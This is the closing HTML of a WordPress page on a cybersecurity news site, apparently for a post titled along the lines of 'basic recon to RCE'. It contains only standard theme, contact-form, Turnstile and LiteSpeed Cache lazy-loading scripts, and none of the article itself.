type="speculationrules">{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/gridhot-pro/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}</script> <script id="wp-i18n-js-after" type="litespeed/javascript">wp.i18n.setLocaleData({'text direction\u0004ltr':['ltr']})</script> <script id="contact-form-7-js-before" type="litespeed/javascript">var wpcf7={"api":{"root":"https:\/\/cybernoz.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":1}</script> <script type="litespeed/javascript" data-src="https://challenges.cloudflare.com/turnstile/v0/api.js" id="cloudflare-turnstile-js" data-wp-strategy="async"></script> <script id="cloudflare-turnstile-js-after" type="litespeed/javascript">document.addEventListener('wpcf7submit',e=>turnstile.reset())</script> <script id="gridhot-customjs-js-extra" type="litespeed/javascript">var gridhot_ajax_object={"ajaxurl":"https://cybernoz.com/wp-admin/admin-ajax.php","primary_menu_active":"1","secondary_menu_active":"1","primary_mobile_menu_active":"1","secondary_mobile_menu_active":"1","sticky_header_active":"1","sticky_header_mobile_active":"","sticky_sidebar_active":"1","news_ticker_active":"1","news_ticker_duration":"100000","news_ticker_direction":"left","masonry_active":"","fitvids_active":"","backtotop_active":"1","columnwidth":".gridhot-4-col-sizer","gutter":".gridhot-4-col-gutter","posts_navigation_active":"1","posts_navigation_type":"numberednavi","loadmore":"Load More","loading":"Loading...","loadfailed":"Failed to load posts.","load_more_nonce":"86b59c9076","posts":"{\"page\":0,\"name\":\"basic-recon-to-rce-iii\",\"error\":\"\",\"m\":\"\",\"p\":0,\"post_parent\":\"\",\"subpost\":\"\",\"subpost_id\":\"\",\"attachment\":\"\",\"attachment_id\":0,\"pagename\":\"\",\"page_id\":0,\"second\":\"\",\"minute\":\"\",\"hour\":\"\",\"day\":0,\"monthnum\":0,\"year\":0,\"w\":0,\"category_name\":\"\",\"tag\":\"\",\"cat\":\"\",\"tag_id\":\"\",\"author\":\"\",\"author_name\":\"\",\"feed\":\"\",\"tb\":\"\",\"paged\":0,\"meta_key\":\"\",\"meta_value\":\"\",\"preview\":\"\",\"s\":\"\",\"sentence\":\"\",\"title\":\"\",\"fields\":\"all\",\"menu_order\":\"\",\"embed\":\"\",\"category__in\":[],\"category__not_in\":[],\"category__and\":[],\"post__in\":[],\"post__not_in\":[],\"post_name__in\":[],\"tag__in\":[],\"tag__not_in\":[],\"tag__and\":[],\"tag_slug__in\":[],\"tag_slug__and\":[],\"post_parent__in\":[],\"post_parent__not_in\":[],\"author__in\":[],\"author__not_in\":[],\"search_columns\":[],\"ignore_sticky_posts\":false,\"suppress_filters\":false,\"cache_results\":true,\"update_post_term_cache\":true,\"update_menu_item_cache\":false,\"lazy_load_term_meta\":true,\"update_post_meta_cache\":true,\"post_type\":\"\",\"posts_per_page\":12,\"nopaging\":false,\"comments_per_page\":\"50\",\"no_found_rows\":false,\"order\":\"DESC\"}","current_page":"1","max_page":"0"}</script> <script type="text/javascript" src="https://js.cybernoz.com/wp-content/plugins/litespeed-cache/assets/js/instant_click.min.js" id="litespeed-cache-js" defer="defer" data-wp-strategy="defer"></script> <script data-no-optimize="1">window.lazyLoadOptions=Object.assign({},{threshold:300},window.lazyLoadOptions||{});!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).LazyLoad=e()}(this,function(){"use strict";function e(){return(e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n,a=arguments[e];for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(t[n]=a[n])}return t}).apply(this,arguments)}function o(t){return e({},at,t)}function l(t,e){return t.getAttribute(gt+e)}function c(t){return l(t,vt)}function s(t,e){return function(t,e,n){e=gt+e;null!==n?t.setAttribute(e,n):t.removeAttribute(e)}(t,vt,e)}function i(t){return s(t,null),0}function r(t){return null===c(t)}function u(t){return c(t)===_t}function d(t,e,n,a){t&&(void 0===a?void 0===n?t(e):t(e,n):t(e,n,a))}function f(t,e){et?t.classList.add(e):t.className+=(t.className?" ":"")+e}function _(t,e){et?t.classList.remove(e):t.className=t.className.replace(new RegExp("(^|\\s+)"+e+"(\\s+|$)")," ").replace(/^\s+/,"").replace(/\s+$/,"")}function g(t){return t.llTempImage}function v(t,e){!e||(e=e._observer)&&e.unobserve(t)}function b(t,e){t&&(t.loadingCount+=e)}function p(t,e){t&&(t.toLoadCount=e)}function n(t){for(var e,n=[],a=0;e=t.children[a];a+=1)"SOURCE"===e.tagName&&n.push(e);return n}function h(t,e){(t=t.parentNode)&&"PICTURE"===t.tagName&&n(t).forEach(e)}function a(t,e){n(t).forEach(e)}function m(t){return!!t[lt]}function E(t){return t[lt]}function I(t){return delete t[lt]}function y(e,t){var n;m(e)||(n={},t.forEach(function(t){n[t]=e.getAttribute(t)}),e[lt]=n)}function L(a,t){var o;m(a)&&(o=E(a),t.forEach(function(t){var e,n;e=a,(t=o[n=t])?e.setAttribute(n,t):e.removeAttribute(n)}))}function k(t,e,n){f(t,e.class_loading),s(t,st),n&&(b(n,1),d(e.callback_loading,t,n))}function A(t,e,n){n&&t.setAttribute(e,n)}function O(t,e){A(t,rt,l(t,e.data_sizes)),A(t,it,l(t,e.data_srcset)),A(t,ot,l(t,e.data_src))}function w(t,e,n){var a=l(t,e.data_bg_multi),o=l(t,e.data_bg_multi_hidpi);(a=nt&&o?o:a)&&(t.style.backgroundImage=a,n=n,f(t=t,(e=e).class_applied),s(t,dt),n&&(e.unobserve_completed&&v(t,e),d(e.callback_applied,t,n)))}function x(t,e){!e||0<e.loadingCount||0<e.toLoadCount||d(t.callback_finish,e)}function M(t,e,n){t.addEventListener(e,n),t.llEvLisnrs[e]=n}function N(t){return!!t.llEvLisnrs}function z(t){if(N(t)){var e,n,a=t.llEvLisnrs;for(e in a){var o=a[e];n=e,o=o,t.removeEventListener(n,o)}delete t.llEvLisnrs}}function C(t,e,n){var a;delete t.llTempImage,b(n,-1),(a=n)&&--a.toLoadCount,_(t,e.class_loading),e.unobserve_completed&&v(t,n)}function R(i,r,c){var l=g(i)||i;N(l)||function(t,e,n){N(t)||(t.llEvLisnrs={});var a="VIDEO"===t.tagName?"loadeddata":"load";M(t,a,e),M(t,"error",n)}(l,function(t){var e,n,a,o;n=r,a=c,o=u(e=i),C(e,n,a),f(e,n.class_loaded),s(e,ut),d(n.callback_loaded,e,a),o||x(n,a),z(l)},function(t){var e,n,a,o;n=r,a=c,o=u(e=i),C(e,n,a),f(e,n.class_error),s(e,ft),d(n.callback_error,e,a),o||x(n,a),z(l)})}function T(t,e,n){var a,o,i,r,c;t.llTempImage=document.createElement("IMG"),R(t,e,n),m(c=t)||(c[lt]={backgroundImage:c.style.backgroundImage}),i=n,r=l(a=t,(o=e).data_bg),c=l(a,o.data_bg_hidpi),(r=nt&&c?c:r)&&(a.style.backgroundImage='url("'.concat(r,'")'),g(a).setAttribute(ot,r),k(a,o,i)),w(t,e,n)}function G(t,e,n){var a;R(t,e,n),a=e,e=n,(t=Et[(n=t).tagName])&&(t(n,a),k(n,a,e))}function D(t,e,n){var a;a=t,(-1<It.indexOf(a.tagName)?G:T)(t,e,n)}function S(t,e,n){var a;t.setAttribute("loading","lazy"),R(t,e,n),a=e,(e=Et[(n=t).tagName])&&e(n,a),s(t,_t)}function V(t){t.removeAttribute(ot),t.removeAttribute(it),t.removeAttribute(rt)}function j(t){h(t,function(t){L(t,mt)}),L(t,mt)}function F(t){var e;(e=yt[t.tagName])?e(t):m(e=t)&&(t=E(e),e.style.backgroundImage=t.backgroundImage)}function P(t,e){var n;F(t),n=e,r(e=t)||u(e)||(_(e,n.class_entered),_(e,n.class_exited),_(e,n.class_applied),_(e,n.class_loading),_(e,n.class_loaded),_(e,n.class_error)),i(t),I(t)}function U(t,e,n,a){var o;n.cancel_on_exit&&(c(t)!==st||"IMG"===t.tagName&&(z(t),h(o=t,function(t){V(t)}),V(o),j(t),_(t,n.class_loading),b(a,-1),i(t),d(n.callback_cancel,t,e,a)))}function $(t,e,n,a){var o,i,r=(i=t,0<=bt.indexOf(c(i)));s(t,"entered"),f(t,n.class_entered),_(t,n.class_exited),o=t,i=a,n.unobserve_entered&&v(o,i),d(n.callback_enter,t,e,a),r||D(t,n,a)}function q(t){return t.use_native&&"loading"in HTMLImageElement.prototype}function H(t,o,i){t.forEach(function(t){return(a=t).isIntersecting||0<a.intersectionRatio?$(t.target,t,o,i):(e=t.target,n=t,a=o,t=i,void(r(e)||(f(e,a.class_exited),U(e,n,a,t),d(a.callback_exit,e,n,t))));var e,n,a})}function B(e,n){var t;tt&&!q(e)&&(n._observer=new IntersectionObserver(function(t){H(t,e,n)},{root:(t=e).container===document?null:t.container,rootMargin:t.thresholds||t.threshold+"px"}))}function J(t){return Array.prototype.slice.call(t)}function K(t){return t.container.querySelectorAll(t.elements_selector)}function Q(t){return c(t)===ft}function W(t,e){return e=t||K(e),J(e).filter(r)}function X(e,t){var n;(n=K(e),J(n).filter(Q)).forEach(function(t){_(t,e.class_error),i(t)}),t.update()}function t(t,e){var n,a,t=o(t);this._settings=t,this.loadingCount=0,B(t,this),n=t,a=this,Y&&window.addEventListener("online",function(){X(n,a)}),this.update(e)}var Y="undefined"!=typeof window,Z=Y&&!("onscroll"in window)||"undefined"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),tt=Y&&"IntersectionObserver"in window,et=Y&&"classList"in document.createElement("p"),nt=Y&&1<window.devicePixelRatio,at={elements_selector:".lazy",container:Z||Y?document:null,threshold:300,thresholds:null,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",data_bg_hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_poster:"poster",class_applied:"applied",class_loading:"litespeed-loading",class_loaded:"litespeed-loaded",class_error:"error",class_entered:"entered",class_exited:"exited",unobserve_completed:!0,unobserve_entered:!1,cancel_on_exit:!0,callback_enter:null,callback_exit:null,callback_applied:null,callback_loading:null,callback_loaded:null,callback_error:null,callback_finish:null,callback_cancel:null,use_native:!1},ot="src",it="srcset",rt="sizes",ct="poster",lt="llOriginalAttrs",st="loading",ut="loaded",dt="applied",ft="error",_t="native",gt="data-",vt="ll-status",bt=[st,ut,dt,ft],pt=[ot],ht=[ot,ct],mt=[ot,it,rt],Et={IMG:function(t,e){h(t,function(t){y(t,mt),O(t,e)}),y(t,mt),O(t,e)},IFRAME:function(t,e){y(t,pt),A(t,ot,l(t,e.data_src))},VIDEO:function(t,e){a(t,function(t){y(t,pt),A(t,ot,l(t,e.data_src))}),y(t,ht),A(t,ct,l(t,e.data_poster)),A(t,ot,l(t,e.data_src)),t.load()}},It=["IMG","IFRAME","VIDEO"],yt={IMG:j,IFRAME:function(t){L(t,pt)},VIDEO:function(t){a(t,function(t){L(t,pt)}),L(t,ht),t.load()}},Lt=["IMG","IFRAME","VIDEO"];return t.prototype={update:function(t){var e,n,a,o=this._settings,i=W(t,o);{if(p(this,i.length),!Z&&tt)return q(o)?(e=o,n=this,i.forEach(function(t){-1!==Lt.indexOf(t.tagName)&&S(t,e,n)}),void p(n,0)):(t=this._observer,o=i,t.disconnect(),a=t,void o.forEach(function(t){a.observe(t)}));this.loadAll(i)}},destroy:function(){this._observer&&this._observer.disconnect(),K(this._settings).forEach(function(t){I(t)}),delete this._observer,delete this._settings,delete this.loadingCount,delete this.toLoadCount},loadAll:function(t){var e=this,n=this._settings;W(t,n).forEach(function(t){v(t,e),D(t,n,e)})},restoreAll:function(){var e=this._settings;K(e).forEach(function(t){P(t,e)})}},t.load=function(t,e){e=o(e);D(t,e)},t.resetStatus=function(t){i(t)},t}),function(t,e){"use strict";function n(){e.body.classList.add("litespeed_lazyloaded")}function a(){console.log("[LiteSpeed] Start Lazy Load"),o=new LazyLoad(Object.assign({},t.lazyLoadOptions||{},{elements_selector:"[data-lazyloaded]",callback_finish:n})),i=function(){o.update()},t.MutationObserver&&new MutationObserver(i).observe(e.documentElement,{childList:!0,subtree:!0,attributes:!0})}var o,i;t.addEventListener?t.addEventListener("load",a,!1):t.attachEvent("onload",a)}(window,document);</script><script data-no-optimize="1">window.litespeed_ui_events=window.litespeed_ui_events||["mouseover","click","keydown","wheel","touchmove","touchstart"];var urlCreator=window.URL||window.webkitURL;function litespeed_load_delayed_js_force(){console.log("[LiteSpeed] Start Load JS Delayed"),litespeed_ui_events.forEach(e=>{window.removeEventListener(e,litespeed_load_delayed_js_force,{passive:!0})}),document.querySelectorAll("iframe[data-litespeed-src]").forEach(e=>{e.setAttribute("src",e.getAttribute("data-litespeed-src"))}),"loading"==document.readyState?window.addEventListener("DOMContentLoaded",litespeed_load_delayed_js):litespeed_load_delayed_js()}litespeed_ui_events.forEach(e=>{window.addEventListener(e,litespeed_load_delayed_js_force,{passive:!0})});async function litespeed_load_delayed_js(){let t=[];for(var d in document.querySelectorAll('script[type="litespeed/javascript"]').forEach(e=>{t.push(e)}),t)await new Promise(e=>litespeed_load_one(t[d],e));document.dispatchEvent(new Event("DOMContentLiteSpeedLoaded")),window.dispatchEvent(new Event("DOMContentLiteSpeedLoaded"))}function litespeed_load_one(t,e){console.log("[LiteSpeed] Load ",t);var d=document.createElement("script");d.addEventListener("load",e),d.addEventListener("error",e),t.getAttributeNames().forEach(e=>{"type"!=e&&d.setAttribute("data-src"==e?"src":e,t.getAttribute(e))});let a=!(d.type="text/javascript");!d.src&&t.textContent&&(d.src=litespeed_inline2src(t.textContent),a=!0),t.after(d),t.remove(),a&&e()}function litespeed_inline2src(t){try{var d=urlCreator.createObjectURL(new Blob([t.replace(/^(?:<!--)?(.*?)(?:-->)?$/gm,"$1")],{type:"text/javascript"}))}catch(e){d="data:text/javascript;base64,"+btoa(t.replace(/^(?:<!--)?(.*?)(?:-->)?$/gm,"$1"))}return d}</script><script data-no-optimize="1">var litespeed_vary=document.cookie.replace(/(?:(?:^|.*;\s*)_lscache_vary\s*\=\s*([^;]*).*$)|^.*$/,"");litespeed_vary||(sessionStorage.getItem("litespeed_reloaded")?console.log("LiteSpeed: skipping guest vary reload (already reloaded this session)"):fetch("/wp-content/plugins/litespeed-cache/guest.vary.php",{method:"POST",cache:"no-cache",redirect:"follow"}).then(e=>e.json()).then(e=>{console.log(e),e.hasOwnProperty("reload")&&"yes"==e.reload&&(sessionStorage.setItem("litespeed_docref",document.referrer),sessionStorage.setItem("litespeed_reloaded","1"),window.location.reload(!0))}));</script><script data-optimized="1" type="litespeed/javascript" data-src="https://js.cybernoz.com/wp-content/litespeed/js/5275876ab2a8f8d6a2e6f9ff54cbae09.js?ver=ed054"></script></body></html> <!-- Page optimized by LiteSpeed Cache @2026-03-10 14:05:04 --> <!-- Page cached by LiteSpeed Cache 7.8 on 2026-03-10 14:05:03 --> <!-- Guest Mode --> <!-- QUIC.cloud UCSS in queue -->